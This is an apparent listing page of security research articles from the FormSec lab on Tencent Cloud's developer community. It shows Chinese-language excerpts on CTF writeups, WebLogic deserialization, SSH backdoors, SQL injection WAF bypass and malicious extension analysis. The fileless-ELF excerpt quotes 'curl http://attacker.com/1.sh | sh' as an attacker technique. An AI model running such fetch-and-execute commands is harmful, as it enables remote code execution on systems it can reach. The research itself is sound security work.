逢魔安全实验室-腾讯云开发者社区

开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

逢魔安全实验室

专栏成员

26

文章

52710

阅读量

37

订阅数

基于Chorme headless的xss检测实践

https://blog.formsec.cn/2018/07/12/%E5%9F%BA%E4%BA%8EChrome-headless%E7%9A%84XSS%E6%A3%80%E6%B5%8B/

2018-07-24

1.5K0

wordpress任意文件删除漏洞分析

本文内容比较多，建议点击https://blog.formsec.cn/2018/07/03/wordpress%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%88%A0%E9%99%A4%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

2018-07-24

6410

铁人三项2018 pwn [aleph1] Writeup

本文内容比较多，建议点击https://blog.formsec.cn/2018/06/11/%E9%93%81%E4%BA%BA%E4%B8%89%E9%A1%B92018-pwn-aleph1-Writeup/

2018-07-24

6090

铁人三项2018 pwn [heapmain] Writeup

这个题目的原题是RHME3，直接拿来二进制修改，去掉网络函数，使用socat部署。这波操作可还行

2018-07-24

4080

ISCC 2018 Writeup

ISCC 2018 CTF中，一些题目还是很不错的。但是需要吐槽的就是这个积分机制，私以为一次性放出所有题目而且反作弊机制完善的情况下动态积分这个方法很好。但是，战线太长还是不要用动态积分。不过话说回来，战线长也是ISCC的传统吧。最后祝ISCC越办越好！也希望我们的Writeup能对大家有所帮助吧！赛事的运维人员还是很nice的

2018-07-24

2.4K0

American Fuzz Lop (AFL) Fuzz 初探

0x00 AFL 基础 American Fuzz Lop简称 AFL，是一款模糊测试工具。模糊测试（Fuzzing），是一种通过向目标系统提供非预期的输入并监视异常结果来发现软件漏洞的方法。通常的流程：提供一个正常的输入；修改一部分内容；输入给程序；观察程序的处理过程是否异常。环境 Ubuntu 16.04 LTS X86_64 安装 apt install afl 如果大家需要较新版本的AFL，也可通过AFL的官网下载源码自行编译。http://lcamtuf.coredump.cx/afl/rel

2018-05-17

2.1K0

某移动应用安全加固与脱壳技术研究与实例分析

01 概述 — 由于近期很多朋友问关于Android加壳与脱壳技术，这两天我就对目前主流的脱壳工具和加壳方法做了研究，就对目前的脱壳方法做个汇总和方法记录。首先目前市面上有很多的安卓脱壳工具，主流的有DexExtractor, ZjDroid, drizzleDumper,其中前面的2个工具与后面的工具略有不同，文章会一一对工具进行分析和尝试脱壳，各个工具的使用都在手机root的环境下进行的，并且在实体机上进行，所以如果有读者尝试破解的话建议还是在实体机上进行。其实对于加壳的方案很多加固尝试都做了什么

2018-05-15

3.1K0

Linux无文件渗透执行ELF

注：本文仅用于知识分享，请勿用于非法攻击，任何后果与本团队无关。 01 简介在进行Linux系统的攻击应急时，大家可能会查看pid以及/proc相关信息，比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令，通过/proc/$pid/exe抓样本等，但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢？最近看了一篇@MagisterQuis写的文章https://magisterquis.githu

2018-05-15

5.6K0

解密混淆的PHP程序

0x01 背景团队大佬在做PHP代码审计的时候发现PHP代码是被混淆过的。虽然可以通过自己手动解密可以还原原先的PHP代码，但是混淆过程比较复杂且自己写脚本还原非常麻烦。所以，我这边通过PHP底层的操作对混淆后的PHP代码进行还原。 0x02 PHP代码混淆原理 PHP代码混淆一般来说有两种方法：需要PHP扩展无需PHP扩展本文我们主要讲解无需PHP扩展的代码混淆的解密。大多数的无需扩展的php代码混淆原理上都是使用eval进行代码的执行。如果我们能够得到eval函数的参数，即可获得解密后的代码

2018-05-15

3.3K0

CVE-2018-2628 Weblogic反序列化POC重构详解

01 背景 Oracle官方在修补老的Weblogic反序列化漏洞时，将已经在互联网上暴露的PoC都加入了黑名单，所以若是绕过他的黑名单限制就依旧可以触发命令执行。接下来我们简单分析一下本次漏洞的成因，具体的weblogic反序列化漏洞原理这里不做具体分析，之后可以分享一次专题。这里我们来看看InboundMsgAbbrev中resolveProxyClass的实现，resolveProxyClass是处理rmi接口类型的，只判断了java.rmi.registry.Registry，其实随便

2018-05-15

1.4K0

DDCTF 2018 逆向 baby_mips Writeup

0x00 背景最近一直在研究IoT设备的安全，而在IoT设备上程序很多都是MIPS架构的。所以对MIPS指令有一定研究，而在DDCTF 2018中刚好有一道逆向题目是MIPS程序，于是尝试做了一下。 0x01 环境搭建由于我们通常的操作系统指令集都是x86的，所以无法跑MIPS程序。这时候就需要装QEMU来模拟，QEMU通过源码编译较为复杂，我们又没有特殊的需求，所以直接使用ubuntu的APT进行安装即可。由于MIPS架构有两种——大端MIPS和小端MIPS。所以，我们需要确定这个程序是大端MI

2018-05-15

1.6K0

Some Linux Hacking Tricks

linux 人工智能 grep python ruby

There is always a method here is useful for you to penetrantion testing ：） Some ways to read system files 1cat /etc/issue 2tac /etc/issue 3less /etc/issue 4more /etc/issue 5head /etc/issue 6tail /etc/issue 7nl /etc/issue 8xxd /etc/issue 9sort /et

2018-05-15

8340

UAF Writeup - pwnable.kr

0x00 UAF — pwnable.kr是一个韩国的CTF练习的网站，有很多经典的CTF题目供爱好者练习。 UAF(Use After Free)释放后重用，其实是一种指针未置空造成的漏洞。在操作系统中，为了加快程序运行速度，如果释放一块n字节大小的内存空间，当申请一块同样大小的内存空间时，会将刚刚释放的内存空间重新分配。如果指向这块内存空间的指针没有置空，会造成一系列的问题。 0x01 Fastbin — fastbin顾名思义，fast就是要快。所以fastbin旨在加快操作系统的内存分配速度，f

2018-03-29

9890

Grammarly For Chrome扩展任意用户劫持漏洞分析

01 — 综述 2018年02月02日，Grammarly官方更新了Grammarly for Chrome 14.826.1446版本，其中修复了一个严重漏洞，在此之前的版本中此扩展能够向所有网站曝

2018-03-29

1.3K0

基于python的自动化代码审计

新年马上到了，FormSec现在这里给大家拜年，祝大家狗年旺财！当然新年礼物已经给大家备好了：《基于python的自动化代码审计》本文通过介绍在python开发中经常出现的常规web漏

2018-03-29

1.8K0

渗透基础-SSH后门分析总结

对于UNIX系统来说，ssh服务端作为最广泛应用的远程管理服务并且有一定对外开放的必然性，必然引起黑客关注，所以ssh类的后门也是unix下最经典的后门方式之一了。作为渗透基础知识，逢魔安全团队在本文

2018-03-29

3.3K0

中间件安全-Tomcat安全测试概要

关注我们，掌握成员招募最新动态！ Web安全中很重要的一个部分就是中间件的安全问题，而中间件的安全问题主要来源于两部分，一个是中间件本身由于设计缺陷而导致的安全问题，另一个就是默认配置或

2018-03-29

2K0

隐藏在Chrome插件商店中的恶魔——恶意插件User-Agent Swither分析

0x00 插件背景 — User-Agent Swither 是一款Chrome插件，用户切换访问web时候的User-Agent的，这个插件有51万条安装量。大部分都是前端工作人员或者安全研究人员使

2018-03-29

1.5K0

SQL注入ByPass的一些小技巧

sql 安全云数据库 SQL Server

01 — 前言 SQL注入从古至今都是一个经久不衰的影响严重的高危漏洞，但是网络安全发展到现在，如果想通过SQL注入直接获取数据或者权限，多多少少都需要绕过一些网站前面的WAF，无论是基于规则的还是带

2018-03-29

1.9K0

从CPU漏洞Meltdown&Spectre看侧信道攻击

0x00 前言 2018伊始，两个芯片级漏洞Meltdown（熔断）、Spectre（幽灵）漏洞震惊的安全界。受影响的CPU包括Intel、AMD和ARM，基本囊括的消费级CPU市场的绝大部分。Meltdown漏洞可以在用户态越权读取内核态的内存数据，Spectre漏洞可以通过浏览器的Javascript读取用户态的内存数据。虽然这两个漏洞对个人PC影响有限，但是确摧毁了公有云的基石——用户可在虚拟机里可以无限制的读取宿主机或者其他虚拟机的数据。 0x01 背景知识了解Meltdown和Spectre

2018-03-29

2.4K0

点击加载更多

社区活动

Python精品学习库

代码在线跑，知识轻松学

博客搬家 | 分享价值百万资源包

自行/邀约他人一键搬运博客，速成社区影响力并领取好礼

技术创作特训营·精选知识专栏

往期视频·干货材料·成员作品最新动态